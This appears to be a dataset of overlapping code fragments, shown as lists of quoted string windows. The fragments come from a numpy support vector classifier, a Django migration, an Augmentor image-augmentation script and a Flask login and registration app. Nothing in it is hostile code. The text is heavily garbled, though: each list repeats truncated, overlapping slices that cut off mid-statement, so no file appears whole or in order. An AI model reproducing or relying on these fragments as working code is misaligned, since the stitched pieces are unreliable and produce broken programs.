"---------- X : (sample_size, n_features) ndarray input data t : (sample_size,) ndarray corresponding",
"support vectors of the boundary \"\"\" if X.ndim == 1: X = X[:,",
"self.a) def predict(self, x): \"\"\" predict labels of the input Parameters ---------- x",
"float update ratio of the lagrange multiplier decay_step : int number of iterations",
"\"\"\" construct support vector classifier Parameters ---------- kernel : Kernel kernel function to",
"(sample_size,) ndarray predicted labels \"\"\" y = self.distance(x) label = np.sign(y) return label",
"float bias parameter support_vector : (n_vector, n_features) ndarray support vectors of the boundary",
"np.mean( self.t - np.sum( self.a * self.t * self.kernel(self.X, self.X), axis=-1)) if self.C",
"= kernel self.C = C def fit(self, X, t, learning_rate=0.1, decay_step=10000, decay_rate=0.9, min_lr=1e-5):",
"if lr < min_lr: break lr *= decay_rate def lagrangian_function(self): return ( np.sum(self.a)",
"products C : float penalty of misclassification \"\"\" self.kernel = kernel self.C =",
"C : float penalty of misclassification \"\"\" self.kernel = kernel self.C = C",
"rtol=0.01, atol=0.01): break else: if np.all(np.greater_equal(1.01, self.distance(self.X) * self.t)): break if lr <",
"kernel self.C = C def fit(self, X, t, learning_rate=0.1, decay_step=10000, decay_rate=0.9, min_lr=1e-5): \"\"\"",
"2 assert t.ndim == 1 lr = learning_rate t2 = np.sum(np.square(t)) if self.C",
"boundary and its support vectors Parameters ---------- X : (sample_size, n_features) ndarray input",
"if self.C == np.Inf: if np.allclose(self.distance(self.X) * self.t, 1, rtol=0.01, atol=0.01): break else:",
"* t / t2 np.clip(a, 0, self.C, out=a) mask = a > 0",
"Gram while True: for i in range(decay_step): grad = 1 - H @",
"- np.sum( self.a * self.t * self.kernel(self.X, self.X), axis=-1)) if self.C == np.Inf:",
"Parameters ---------- x : (sample_size, n_features) ndarray input Returns ------- distance : (sample_size,)",
"* self.t)): break if lr < min_lr: break lr *= decay_rate def lagrangian_function(self):",
"-= (a @ t) * t / t2 np.clip(a, 0, self.C, out=a) mask",
"self.b = np.mean( self.t - np.sum( self.a * self.t * self.kernel(self.X, self.X), axis=-1))",
"= a > 0 self.X = X[mask] self.t = t[mask] self.a = a[mask]",
"the input Parameters ---------- x : (sample_size, n_features) ndarray input Returns ------- label",
"float penalty of misclassification \"\"\" self.kernel = kernel self.C = C def fit(self,",
"atol=0.01): break else: if np.all(np.greater_equal(1.01, self.distance(self.X) * self.t)): break if lr < min_lr:",
"\"\"\" y = self.distance(x) label = np.sign(y) return label def distance(self, x): \"\"\"",
"as np class SupportVectorClassifier(object): def __init__(self, kernel, C=np.Inf): \"\"\" construct support vector classifier",
"misclassification \"\"\" self.kernel = kernel self.C = C def fit(self, X, t, learning_rate=0.1,",
"H = t * t[:, None] * Gram while True: for i in",
"Gram = self.kernel(X, X) H = t * t[:, None] * Gram while",
"*= decay_rate def lagrangian_function(self): return ( np.sum(self.a) - self.a @ (self.t * self.t[:,",
"self.t)): break if lr < min_lr: break lr *= decay_rate def lagrangian_function(self): return",
"a -= (a @ t) * t / t2 np.clip(a, 0, self.C, out=a)",
"self.kernel(self.X, self.X)) @ self.a) def predict(self, x): \"\"\" predict labels of the input",
"= C def fit(self, X, t, learning_rate=0.1, decay_step=10000, decay_rate=0.9, min_lr=1e-5): \"\"\" estimate decision",
"estimate decision boundary and its support vectors Parameters ---------- X : (sample_size, n_features)",
"i in range(decay_step): grad = 1 - H @ a a += lr",
"= X[:, None] assert X.ndim == 2 assert t.ndim == 1 lr =",
"rate decay min_lr : float minimum value of learning rate Attributes ---------- a",
"predict(self, x): \"\"\" predict labels of the input Parameters ---------- x : (sample_size,",
"t : (sample_size,) ndarray corresponding labels 1 or -1 learning_rate : float update",
"decay decay_rate : float rate of learning rate decay min_lr : float minimum",
"a > 0 self.X = X[mask] self.t = t[mask] self.a = a[mask] self.b",
"= np.sum(np.square(t)) if self.C == np.Inf: a = np.ones(len(t)) else: a = np.zeros(len(t))",
"= np.mean( self.t - np.sum( self.a * self.t * self.kernel(self.X, self.X), axis=-1)) if",
"out=a) mask = a > 0 self.X = X[mask] self.t = t[mask] self.a",
"self.C = C def fit(self, X, t, learning_rate=0.1, decay_step=10000, decay_rate=0.9, min_lr=1e-5): \"\"\" estimate",
"multiplier decay_step : int number of iterations till decay decay_rate : float rate",
"* self.t * self.kernel(self.X, self.X), axis=-1)) if self.C == np.Inf: if np.allclose(self.distance(self.X) *",
"* self.kernel(self.X, self.X)) @ self.a) def predict(self, x): \"\"\" predict labels of the",
"a = np.ones(len(t)) else: a = np.zeros(len(t)) + self.C / 10 Gram =",
"1, rtol=0.01, atol=0.01): break else: if np.all(np.greater_equal(1.01, self.distance(self.X) * self.t)): break if lr",
"\"\"\" if X.ndim == 1: X = X[:, None] assert X.ndim == 2",
"vectors of the boundary \"\"\" if X.ndim == 1: X = X[:, None]",
"a a += lr * grad a -= (a @ t) * t",
"label def distance(self, x): \"\"\" calculate distance from the decision boundary Parameters ----------",
"10 Gram = self.kernel(X, X) H = t * t[:, None] * Gram",
"def lagrangian_function(self): return ( np.sum(self.a) - self.a @ (self.t * self.t[:, None] *",
"== 1: X = X[:, None] assert X.ndim == 2 assert t.ndim ==",
"if np.all(np.greater_equal(1.01, self.distance(self.X) * self.t)): break if lr < min_lr: break lr *=",
"= self.kernel(X, X) H = t * t[:, None] * Gram while True:",
"def __init__(self, kernel, C=np.Inf): \"\"\" construct support vector classifier Parameters ---------- kernel :",
"---------- x : (sample_size, n_features) ndarray input Returns ------- distance : (sample_size,) ndarray",
"min_lr: break lr *= decay_rate def lagrangian_function(self): return ( np.sum(self.a) - self.a @",
"grad a -= (a @ t) * t / t2 np.clip(a, 0, self.C,",
"kernel : Kernel kernel function to compute inner products C : float penalty",
"rate of learning rate decay min_lr : float minimum value of learning rate",
"label : (sample_size,) ndarray predicted labels \"\"\" y = self.distance(x) label = np.sign(y)",
"a : (sample_size,) ndarray lagrange multiplier b : float bias parameter support_vector :",
"function to compute inner products C : float penalty of misclassification \"\"\" self.kernel",
"kernel function to compute inner products C : float penalty of misclassification \"\"\"",
"learning rate Attributes ---------- a : (sample_size,) ndarray lagrange multiplier b : float",
"predicted labels \"\"\" y = self.distance(x) label = np.sign(y) return label def distance(self,",
"SupportVectorClassifier(object): def __init__(self, kernel, C=np.Inf): \"\"\" construct support vector classifier Parameters ---------- kernel",
"else: a = np.zeros(len(t)) + self.C / 10 Gram = self.kernel(X, X) H",
"construct support vector classifier Parameters ---------- kernel : Kernel kernel function to compute",
"of learning rate decay min_lr : float minimum value of learning rate Attributes",
"= self.distance(x) label = np.sign(y) return label def distance(self, x): \"\"\" calculate distance",
"inner products C : float penalty of misclassification \"\"\" self.kernel = kernel self.C",
"of misclassification \"\"\" self.kernel = kernel self.C = C def fit(self, X, t,",
"return label def distance(self, x): \"\"\" calculate distance from the decision boundary Parameters",
"= X[mask] self.t = t[mask] self.a = a[mask] self.b = np.mean( self.t -",
": (sample_size,) ndarray lagrange multiplier b : float bias parameter support_vector : (n_vector,",
": float rate of learning rate decay min_lr : float minimum value of",
"\"\"\" distance = np.sum( self.a * self.t * self.kernel(x, self.X), axis=-1) + self.b",
"iterations till decay decay_rate : float rate of learning rate decay min_lr :",
"lr *= decay_rate def lagrangian_function(self): return ( np.sum(self.a) - self.a @ (self.t *",
"update ratio of the lagrange multiplier decay_step : int number of iterations till",
"ratio of the lagrange multiplier decay_step : int number of iterations till decay",
"learning rate decay min_lr : float minimum value of learning rate Attributes ----------",
"min_lr : float minimum value of learning rate Attributes ---------- a : (sample_size,)"
] |
[
"if IP: p.random_color(0.5, min_factor=0.4, max_factor=1.6) p.random_brightness(0.5, min_factor=0.4, max_factor=1.6) p.random_contrast(0.5, min_factor=0.4, max_factor=1.2) if Graph:",
"= Augmentor.Pipeline(folder) if IP: p.random_color(0.5, min_factor=0.4, max_factor=1.6) p.random_brightness(0.5, min_factor=0.4, max_factor=1.6) p.random_contrast(0.5, min_factor=0.4, max_factor=1.2)",
"<filename>anti-spoof/augmentor.py<gh_stars>1-10 import Augmentor def RandomAugment(folder, IP=False, Graph=False, Erase=False): if IP==False and Graph==False and",
"Graph: #p.rotate(probability=0.7, max_left_rotation=20, max_right_rotation=20) #p.zoom(probability=0.5, min_factor=0.8, max_factor=1.2) p.random_distortion(probability=0.5, grid_width=4, grid_height=4, magnitude=4) #p.skew_left_right(probability=0.5, magnitude=0.15)",
"RandomAugment(folder, IP=False, Graph=False, Erase=False): if IP==False and Graph==False and Erase==False: return None p",
"p.random_erasing(1.0,rectangle_area=0.5) return p if __name__=='__main__': folder = '29xxx' p = RandomAugment(folder, Graph=True) p.sample(1000)",
"if Graph: #p.rotate(probability=0.7, max_left_rotation=20, max_right_rotation=20) #p.zoom(probability=0.5, min_factor=0.8, max_factor=1.2) p.random_distortion(probability=0.5, grid_width=4, grid_height=4, magnitude=4) #p.skew_left_right(probability=0.5,",
"p.random_distortion(probability=0.5, grid_width=4, grid_height=4, magnitude=4) #p.skew_left_right(probability=0.5, magnitude=0.15) if Erase: p.random_erasing(1.0,rectangle_area=0.5) return p if __name__=='__main__':",
"p.random_brightness(0.5, min_factor=0.4, max_factor=1.6) p.random_contrast(0.5, min_factor=0.4, max_factor=1.2) if Graph: #p.rotate(probability=0.7, max_left_rotation=20, max_right_rotation=20) #p.zoom(probability=0.5, min_factor=0.8,",
"Erase: p.random_erasing(1.0,rectangle_area=0.5) return p if __name__=='__main__': folder = '29xxx' p = RandomAugment(folder, Graph=True)",
"and Erase==False: return None p = Augmentor.Pipeline(folder) if IP: p.random_color(0.5, min_factor=0.4, max_factor=1.6) p.random_brightness(0.5,",
"if Erase: p.random_erasing(1.0,rectangle_area=0.5) return p if __name__=='__main__': folder = '29xxx' p = RandomAugment(folder,",
"IP=False, Graph=False, Erase=False): if IP==False and Graph==False and Erase==False: return None p =",
"#p.zoom(probability=0.5, min_factor=0.8, max_factor=1.2) p.random_distortion(probability=0.5, grid_width=4, grid_height=4, magnitude=4) #p.skew_left_right(probability=0.5, magnitude=0.15) if Erase: p.random_erasing(1.0,rectangle_area=0.5) return",
"max_factor=1.2) p.random_distortion(probability=0.5, grid_width=4, grid_height=4, magnitude=4) #p.skew_left_right(probability=0.5, magnitude=0.15) if Erase: p.random_erasing(1.0,rectangle_area=0.5) return p if",
"IP: p.random_color(0.5, min_factor=0.4, max_factor=1.6) p.random_brightness(0.5, min_factor=0.4, max_factor=1.6) p.random_contrast(0.5, min_factor=0.4, max_factor=1.2) if Graph: #p.rotate(probability=0.7,",
"max_factor=1.6) p.random_brightness(0.5, min_factor=0.4, max_factor=1.6) p.random_contrast(0.5, min_factor=0.4, max_factor=1.2) if Graph: #p.rotate(probability=0.7, max_left_rotation=20, max_right_rotation=20) #p.zoom(probability=0.5,",
"#p.skew_left_right(probability=0.5, magnitude=0.15) if Erase: p.random_erasing(1.0,rectangle_area=0.5) return p if __name__=='__main__': folder = '29xxx' p",
"Erase=False): if IP==False and Graph==False and Erase==False: return None p = Augmentor.Pipeline(folder) if",
"IP==False and Graph==False and Erase==False: return None p = Augmentor.Pipeline(folder) if IP: p.random_color(0.5,",
"#p.rotate(probability=0.7, max_left_rotation=20, max_right_rotation=20) #p.zoom(probability=0.5, min_factor=0.8, max_factor=1.2) p.random_distortion(probability=0.5, grid_width=4, grid_height=4, magnitude=4) #p.skew_left_right(probability=0.5, magnitude=0.15) if",
"p.random_color(0.5, min_factor=0.4, max_factor=1.6) p.random_brightness(0.5, min_factor=0.4, max_factor=1.6) p.random_contrast(0.5, min_factor=0.4, max_factor=1.2) if Graph: #p.rotate(probability=0.7, max_left_rotation=20,",
"max_factor=1.2) if Graph: #p.rotate(probability=0.7, max_left_rotation=20, max_right_rotation=20) #p.zoom(probability=0.5, min_factor=0.8, max_factor=1.2) p.random_distortion(probability=0.5, grid_width=4, grid_height=4, magnitude=4)",
"max_left_rotation=20, max_right_rotation=20) #p.zoom(probability=0.5, min_factor=0.8, max_factor=1.2) p.random_distortion(probability=0.5, grid_width=4, grid_height=4, magnitude=4) #p.skew_left_right(probability=0.5, magnitude=0.15) if Erase:",
"None p = Augmentor.Pipeline(folder) if IP: p.random_color(0.5, min_factor=0.4, max_factor=1.6) p.random_brightness(0.5, min_factor=0.4, max_factor=1.6) p.random_contrast(0.5,",
"import Augmentor def RandomAugment(folder, IP=False, Graph=False, Erase=False): if IP==False and Graph==False and Erase==False:",
"Graph==False and Erase==False: return None p = Augmentor.Pipeline(folder) if IP: p.random_color(0.5, min_factor=0.4, max_factor=1.6)",
"min_factor=0.4, max_factor=1.6) p.random_brightness(0.5, min_factor=0.4, max_factor=1.6) p.random_contrast(0.5, min_factor=0.4, max_factor=1.2) if Graph: #p.rotate(probability=0.7, max_left_rotation=20, max_right_rotation=20)",
"Augmentor def RandomAugment(folder, IP=False, Graph=False, Erase=False): if IP==False and Graph==False and Erase==False: return",
"min_factor=0.4, max_factor=1.6) p.random_contrast(0.5, min_factor=0.4, max_factor=1.2) if Graph: #p.rotate(probability=0.7, max_left_rotation=20, max_right_rotation=20) #p.zoom(probability=0.5, min_factor=0.8, max_factor=1.2)",
"magnitude=0.15) if Erase: p.random_erasing(1.0,rectangle_area=0.5) return p if __name__=='__main__': folder = '29xxx' p =",
"p = Augmentor.Pipeline(folder) if IP: p.random_color(0.5, min_factor=0.4, max_factor=1.6) p.random_brightness(0.5, min_factor=0.4, max_factor=1.6) p.random_contrast(0.5, min_factor=0.4,",
"p.random_contrast(0.5, min_factor=0.4, max_factor=1.2) if Graph: #p.rotate(probability=0.7, max_left_rotation=20, max_right_rotation=20) #p.zoom(probability=0.5, min_factor=0.8, max_factor=1.2) p.random_distortion(probability=0.5, grid_width=4,",
"and Graph==False and Erase==False: return None p = Augmentor.Pipeline(folder) if IP: p.random_color(0.5, min_factor=0.4,",
"min_factor=0.8, max_factor=1.2) p.random_distortion(probability=0.5, grid_width=4, grid_height=4, magnitude=4) #p.skew_left_right(probability=0.5, magnitude=0.15) if Erase: p.random_erasing(1.0,rectangle_area=0.5) return p",
"min_factor=0.4, max_factor=1.2) if Graph: #p.rotate(probability=0.7, max_left_rotation=20, max_right_rotation=20) #p.zoom(probability=0.5, min_factor=0.8, max_factor=1.2) p.random_distortion(probability=0.5, grid_width=4, grid_height=4,",
"grid_width=4, grid_height=4, magnitude=4) #p.skew_left_right(probability=0.5, magnitude=0.15) if Erase: p.random_erasing(1.0,rectangle_area=0.5) return p if __name__=='__main__': folder",
"max_factor=1.6) p.random_contrast(0.5, min_factor=0.4, max_factor=1.2) if Graph: #p.rotate(probability=0.7, max_left_rotation=20, max_right_rotation=20) #p.zoom(probability=0.5, min_factor=0.8, max_factor=1.2) p.random_distortion(probability=0.5,",
"return None p = Augmentor.Pipeline(folder) if IP: p.random_color(0.5, min_factor=0.4, max_factor=1.6) p.random_brightness(0.5, min_factor=0.4, max_factor=1.6)",
"Augmentor.Pipeline(folder) if IP: p.random_color(0.5, min_factor=0.4, max_factor=1.6) p.random_brightness(0.5, min_factor=0.4, max_factor=1.6) p.random_contrast(0.5, min_factor=0.4, max_factor=1.2) if",
"grid_height=4, magnitude=4) #p.skew_left_right(probability=0.5, magnitude=0.15) if Erase: p.random_erasing(1.0,rectangle_area=0.5) return p if __name__=='__main__': folder =",
"magnitude=4) #p.skew_left_right(probability=0.5, magnitude=0.15) if Erase: p.random_erasing(1.0,rectangle_area=0.5) return p if __name__=='__main__': folder = '29xxx'",
"if IP==False and Graph==False and Erase==False: return None p = Augmentor.Pipeline(folder) if IP:",
"max_right_rotation=20) #p.zoom(probability=0.5, min_factor=0.8, max_factor=1.2) p.random_distortion(probability=0.5, grid_width=4, grid_height=4, magnitude=4) #p.skew_left_right(probability=0.5, magnitude=0.15) if Erase: p.random_erasing(1.0,rectangle_area=0.5)",
"Erase==False: return None p = Augmentor.Pipeline(folder) if IP: p.random_color(0.5, min_factor=0.4, max_factor=1.6) p.random_brightness(0.5, min_factor=0.4,",
"Graph=False, Erase=False): if IP==False and Graph==False and Erase==False: return None p = Augmentor.Pipeline(folder)",
"def RandomAugment(folder, IP=False, Graph=False, Erase=False): if IP==False and Graph==False and Erase==False: return None"
] |
[
"django.db.models.deletion from django.conf import settings from django.db import migrations, models class Migration(migrations.Migration): dependencies",
"models class Migration(migrations.Migration): dependencies = [(\"registrations\", \"0014_auto_20180503_1418\")] operations = [ migrations.AlterField( model_name=\"registration\", name=\"created_by\",",
"class Migration(migrations.Migration): dependencies = [(\"registrations\", \"0014_auto_20180503_1418\")] operations = [ migrations.AlterField( model_name=\"registration\", name=\"created_by\", field=models.ForeignKey(",
"to=settings.AUTH_USER_MODEL, ), ), migrations.AlterField( model_name=\"registration\", name=\"updated_by\", field=models.ForeignKey( null=True, on_delete=django.db.models.deletion.SET_NULL, related_name=\"registrations_updated\", to=settings.AUTH_USER_MODEL, ), ),",
"related_name=\"registrations_created\", to=settings.AUTH_USER_MODEL, ), ), migrations.AlterField( model_name=\"registration\", name=\"updated_by\", field=models.ForeignKey( null=True, on_delete=django.db.models.deletion.SET_NULL, related_name=\"registrations_updated\", to=settings.AUTH_USER_MODEL, ),",
"# Generated by Django 2.1.2 on 2018-10-15 10:02 import django.db.models.deletion from django.conf import",
"settings from django.db import migrations, models class Migration(migrations.Migration): dependencies = [(\"registrations\", \"0014_auto_20180503_1418\")] operations",
"migrations, models class Migration(migrations.Migration): dependencies = [(\"registrations\", \"0014_auto_20180503_1418\")] operations = [ migrations.AlterField( model_name=\"registration\",",
"from django.conf import settings from django.db import migrations, models class Migration(migrations.Migration): dependencies =",
"import migrations, models class Migration(migrations.Migration): dependencies = [(\"registrations\", \"0014_auto_20180503_1418\")] operations = [ migrations.AlterField(",
"\"0014_auto_20180503_1418\")] operations = [ migrations.AlterField( model_name=\"registration\", name=\"created_by\", field=models.ForeignKey( null=True, on_delete=django.db.models.deletion.SET_NULL, related_name=\"registrations_created\", to=settings.AUTH_USER_MODEL, ),",
"django.conf import settings from django.db import migrations, models class Migration(migrations.Migration): dependencies = [(\"registrations\",",
"null=True, on_delete=django.db.models.deletion.SET_NULL, related_name=\"registrations_created\", to=settings.AUTH_USER_MODEL, ), ), migrations.AlterField( model_name=\"registration\", name=\"updated_by\", field=models.ForeignKey( null=True, on_delete=django.db.models.deletion.SET_NULL, related_name=\"registrations_updated\",",
"= [(\"registrations\", \"0014_auto_20180503_1418\")] operations = [ migrations.AlterField( model_name=\"registration\", name=\"created_by\", field=models.ForeignKey( null=True, on_delete=django.db.models.deletion.SET_NULL, related_name=\"registrations_created\",",
"django.db import migrations, models class Migration(migrations.Migration): dependencies = [(\"registrations\", \"0014_auto_20180503_1418\")] operations = [",
"), ), migrations.AlterField( model_name=\"registration\", name=\"updated_by\", field=models.ForeignKey( null=True, on_delete=django.db.models.deletion.SET_NULL, related_name=\"registrations_updated\", to=settings.AUTH_USER_MODEL, ), ), ]",
"Generated by Django 2.1.2 on 2018-10-15 10:02 import django.db.models.deletion from django.conf import settings",
"Migration(migrations.Migration): dependencies = [(\"registrations\", \"0014_auto_20180503_1418\")] operations = [ migrations.AlterField( model_name=\"registration\", name=\"created_by\", field=models.ForeignKey( null=True,",
"2018-10-15 10:02 import django.db.models.deletion from django.conf import settings from django.db import migrations, models",
"name=\"created_by\", field=models.ForeignKey( null=True, on_delete=django.db.models.deletion.SET_NULL, related_name=\"registrations_created\", to=settings.AUTH_USER_MODEL, ), ), migrations.AlterField( model_name=\"registration\", name=\"updated_by\", field=models.ForeignKey( null=True,",
"migrations.AlterField( model_name=\"registration\", name=\"created_by\", field=models.ForeignKey( null=True, on_delete=django.db.models.deletion.SET_NULL, related_name=\"registrations_created\", to=settings.AUTH_USER_MODEL, ), ), migrations.AlterField( model_name=\"registration\", name=\"updated_by\",",
"from django.db import migrations, models class Migration(migrations.Migration): dependencies = [(\"registrations\", \"0014_auto_20180503_1418\")] operations =",
"<filename>registrations/migrations/0015_auto_20181015_1002.py # Generated by Django 2.1.2 on 2018-10-15 10:02 import django.db.models.deletion from django.conf",
"2.1.2 on 2018-10-15 10:02 import django.db.models.deletion from django.conf import settings from django.db import",
"= [ migrations.AlterField( model_name=\"registration\", name=\"created_by\", field=models.ForeignKey( null=True, on_delete=django.db.models.deletion.SET_NULL, related_name=\"registrations_created\", to=settings.AUTH_USER_MODEL, ), ), migrations.AlterField(",
"field=models.ForeignKey( null=True, on_delete=django.db.models.deletion.SET_NULL, related_name=\"registrations_created\", to=settings.AUTH_USER_MODEL, ), ), migrations.AlterField( model_name=\"registration\", name=\"updated_by\", field=models.ForeignKey( null=True, on_delete=django.db.models.deletion.SET_NULL,",
"[(\"registrations\", \"0014_auto_20180503_1418\")] operations = [ migrations.AlterField( model_name=\"registration\", name=\"created_by\", field=models.ForeignKey( null=True, on_delete=django.db.models.deletion.SET_NULL, related_name=\"registrations_created\", to=settings.AUTH_USER_MODEL,",
"Django 2.1.2 on 2018-10-15 10:02 import django.db.models.deletion from django.conf import settings from django.db",
"import django.db.models.deletion from django.conf import settings from django.db import migrations, models class Migration(migrations.Migration):",
"10:02 import django.db.models.deletion from django.conf import settings from django.db import migrations, models class",
"model_name=\"registration\", name=\"created_by\", field=models.ForeignKey( null=True, on_delete=django.db.models.deletion.SET_NULL, related_name=\"registrations_created\", to=settings.AUTH_USER_MODEL, ), ), migrations.AlterField( model_name=\"registration\", name=\"updated_by\", field=models.ForeignKey(",
"on 2018-10-15 10:02 import django.db.models.deletion from django.conf import settings from django.db import migrations,",
"dependencies = [(\"registrations\", \"0014_auto_20180503_1418\")] operations = [ migrations.AlterField( model_name=\"registration\", name=\"created_by\", field=models.ForeignKey( null=True, on_delete=django.db.models.deletion.SET_NULL,",
"on_delete=django.db.models.deletion.SET_NULL, related_name=\"registrations_created\", to=settings.AUTH_USER_MODEL, ), ), migrations.AlterField( model_name=\"registration\", name=\"updated_by\", field=models.ForeignKey( null=True, on_delete=django.db.models.deletion.SET_NULL, related_name=\"registrations_updated\", to=settings.AUTH_USER_MODEL,",
"by Django 2.1.2 on 2018-10-15 10:02 import django.db.models.deletion from django.conf import settings from",
"operations = [ migrations.AlterField( model_name=\"registration\", name=\"created_by\", field=models.ForeignKey( null=True, on_delete=django.db.models.deletion.SET_NULL, related_name=\"registrations_created\", to=settings.AUTH_USER_MODEL, ), ),",
"[ migrations.AlterField( model_name=\"registration\", name=\"created_by\", field=models.ForeignKey( null=True, on_delete=django.db.models.deletion.SET_NULL, related_name=\"registrations_created\", to=settings.AUTH_USER_MODEL, ), ), migrations.AlterField( model_name=\"registration\",",
"import settings from django.db import migrations, models class Migration(migrations.Migration): dependencies = [(\"registrations\", \"0014_auto_20180503_1418\")]"
] |
[
"or not student.check_password(form.password.data): flash('Not a username or incorrect password!') return redirect(url_for('login')) login_user(student, remember=form.rememberme.data)",
"**kwargs): db.create_all() @app.route('/', methods=['GET']) @app.route('/index', methods=['GET']) def index(): return render_template('base.html') @app.route('/register', methods=['GET', 'POST'])",
"User from flask_login import current_user, login_user, logout_user, login_required @app.before_first_request def initDB(*args, **kwargs): db.create_all()",
"student.check_password(form.password.data): flash('Not a username or incorrect password!') return redirect(url_for('login')) login_user(student, remember=form.rememberme.data) return redirect(url_for('index'))",
"redirect(url_for('index')) form = LoginForm() if form.validate_on_submit(): student = User.query.filter_by(username=form.username.data).first() if student is None",
"login(): if current_user.is_authenticated: return redirect(url_for('index')) form = LoginForm() if form.validate_on_submit(): student = User.query.filter_by(username=form.username.data).first()",
"db.session.add(acc) db.session.commit() return redirect(url_for('index')) return render_template('user_registration.html', form=form) @login_required @app.route('/logout') def logout(): logout_user() return",
"firstname=form.firstname.data, lastname=form.lastname.data) acc.get_password(form.password2.data) db.session.add(acc) db.session.commit() return redirect(url_for('index')) return render_template('user_registration.html', form=form) @login_required @app.route('/logout') def",
"sqlalchemy from app.forms import RegisterForm, LoginForm from app.models import User from flask_login import",
"username or incorrect password!') return redirect(url_for('login')) login_user(student, remember=form.rememberme.data) return redirect(url_for('index')) return render_template('login.html', title='Login",
"incorrect password!') return redirect(url_for('login')) login_user(student, remember=form.rememberme.data) return redirect(url_for('index')) return render_template('login.html', title='Login Page', form=form)",
"return render_template('base.html') @app.route('/register', methods=['GET', 'POST']) def register(): form = RegisterForm() if form.validate_on_submit(): acc",
"login_required @app.before_first_request def initDB(*args, **kwargs): db.create_all() @app.route('/', methods=['GET']) @app.route('/index', methods=['GET']) def index(): return",
"if form.validate_on_submit(): acc = User(username=form.username.data, email=form.email.data, firstname=form.firstname.data, lastname=form.lastname.data) acc.get_password(form.password2.data) db.session.add(acc) db.session.commit() return redirect(url_for('index'))",
"if student is None or not student.check_password(form.password.data): flash('Not a username or incorrect password!')",
"= User.query.filter_by(username=form.username.data).first() if student is None or not student.check_password(form.password.data): flash('Not a username or",
"render_template, flash, redirect, url_for, request from app import app, db from flask_sqlalchemy import",
"import User from flask_login import current_user, login_user, logout_user, login_required @app.before_first_request def initDB(*args, **kwargs):",
"initDB(*args, **kwargs): db.create_all() @app.route('/', methods=['GET']) @app.route('/index', methods=['GET']) def index(): return render_template('base.html') @app.route('/register', methods=['GET',",
"def logout(): logout_user() return redirect(url_for('index')) @app.route('/login', methods=['GET', 'POST']) def login(): if current_user.is_authenticated: return",
"RegisterForm() if form.validate_on_submit(): acc = User(username=form.username.data, email=form.email.data, firstname=form.firstname.data, lastname=form.lastname.data) acc.get_password(form.password2.data) db.session.add(acc) db.session.commit() return",
"User.query.filter_by(username=form.username.data).first() if student is None or not student.check_password(form.password.data): flash('Not a username or incorrect",
"flask_sqlalchemy import sqlalchemy from app.forms import RegisterForm, LoginForm from app.models import User from",
"form.validate_on_submit(): student = User.query.filter_by(username=form.username.data).first() if student is None or not student.check_password(form.password.data): flash('Not a",
"form=form) @login_required @app.route('/logout') def logout(): logout_user() return redirect(url_for('index')) @app.route('/login', methods=['GET', 'POST']) def login():",
"import sqlalchemy from app.forms import RegisterForm, LoginForm from app.models import User from flask_login",
"email=form.email.data, firstname=form.firstname.data, lastname=form.lastname.data) acc.get_password(form.password2.data) db.session.add(acc) db.session.commit() return redirect(url_for('index')) return render_template('user_registration.html', form=form) @login_required @app.route('/logout')",
"app.forms import RegisterForm, LoginForm from app.models import User from flask_login import current_user, login_user,",
"logout_user() return redirect(url_for('index')) @app.route('/login', methods=['GET', 'POST']) def login(): if current_user.is_authenticated: return redirect(url_for('index')) form",
"import RegisterForm, LoginForm from app.models import User from flask_login import current_user, login_user, logout_user,",
"def register(): form = RegisterForm() if form.validate_on_submit(): acc = User(username=form.username.data, email=form.email.data, firstname=form.firstname.data, lastname=form.lastname.data)",
"@login_required @app.route('/logout') def logout(): logout_user() return redirect(url_for('index')) @app.route('/login', methods=['GET', 'POST']) def login(): if",
"'POST']) def login(): if current_user.is_authenticated: return redirect(url_for('index')) form = LoginForm() if form.validate_on_submit(): student",
"@app.route('/', methods=['GET']) @app.route('/index', methods=['GET']) def index(): return render_template('base.html') @app.route('/register', methods=['GET', 'POST']) def register():",
"from flask_login import current_user, login_user, logout_user, login_required @app.before_first_request def initDB(*args, **kwargs): db.create_all() @app.route('/',",
"redirect(url_for('index')) return render_template('user_registration.html', form=form) @login_required @app.route('/logout') def logout(): logout_user() return redirect(url_for('index')) @app.route('/login', methods=['GET',",
"student = User.query.filter_by(username=form.username.data).first() if student is None or not student.check_password(form.password.data): flash('Not a username",
"import render_template, flash, redirect, url_for, request from app import app, db from flask_sqlalchemy",
"is None or not student.check_password(form.password.data): flash('Not a username or incorrect password!') return redirect(url_for('login'))",
"LoginForm() if form.validate_on_submit(): student = User.query.filter_by(username=form.username.data).first() if student is None or not student.check_password(form.password.data):",
"@app.route('/login', methods=['GET', 'POST']) def login(): if current_user.is_authenticated: return redirect(url_for('index')) form = LoginForm() if",
"return redirect(url_for('index')) return render_template('user_registration.html', form=form) @login_required @app.route('/logout') def logout(): logout_user() return redirect(url_for('index')) @app.route('/login',",
"@app.route('/index', methods=['GET']) def index(): return render_template('base.html') @app.route('/register', methods=['GET', 'POST']) def register(): form =",
"current_user.is_authenticated: return redirect(url_for('index')) form = LoginForm() if form.validate_on_submit(): student = User.query.filter_by(username=form.username.data).first() if student",
"None or not student.check_password(form.password.data): flash('Not a username or incorrect password!') return redirect(url_for('login')) login_user(student,",
"app.models import User from flask_login import current_user, login_user, logout_user, login_required @app.before_first_request def initDB(*args,",
"flash, redirect, url_for, request from app import app, db from flask_sqlalchemy import sqlalchemy",
"db.session.commit() return redirect(url_for('index')) return render_template('user_registration.html', form=form) @login_required @app.route('/logout') def logout(): logout_user() return redirect(url_for('index'))",
"@app.before_first_request def initDB(*args, **kwargs): db.create_all() @app.route('/', methods=['GET']) @app.route('/index', methods=['GET']) def index(): return render_template('base.html')",
"db.create_all() @app.route('/', methods=['GET']) @app.route('/index', methods=['GET']) def index(): return render_template('base.html') @app.route('/register', methods=['GET', 'POST']) def",
"RegisterForm, LoginForm from app.models import User from flask_login import current_user, login_user, logout_user, login_required",
"render_template('base.html') @app.route('/register', methods=['GET', 'POST']) def register(): form = RegisterForm() if form.validate_on_submit(): acc =",
"methods=['GET']) @app.route('/index', methods=['GET']) def index(): return render_template('base.html') @app.route('/register', methods=['GET', 'POST']) def register(): form",
"= RegisterForm() if form.validate_on_submit(): acc = User(username=form.username.data, email=form.email.data, firstname=form.firstname.data, lastname=form.lastname.data) acc.get_password(form.password2.data) db.session.add(acc) db.session.commit()",
"student is None or not student.check_password(form.password.data): flash('Not a username or incorrect password!') return",
"return redirect(url_for('index')) form = LoginForm() if form.validate_on_submit(): student = User.query.filter_by(username=form.username.data).first() if student is",
"not student.check_password(form.password.data): flash('Not a username or incorrect password!') return redirect(url_for('login')) login_user(student, remember=form.rememberme.data) return",
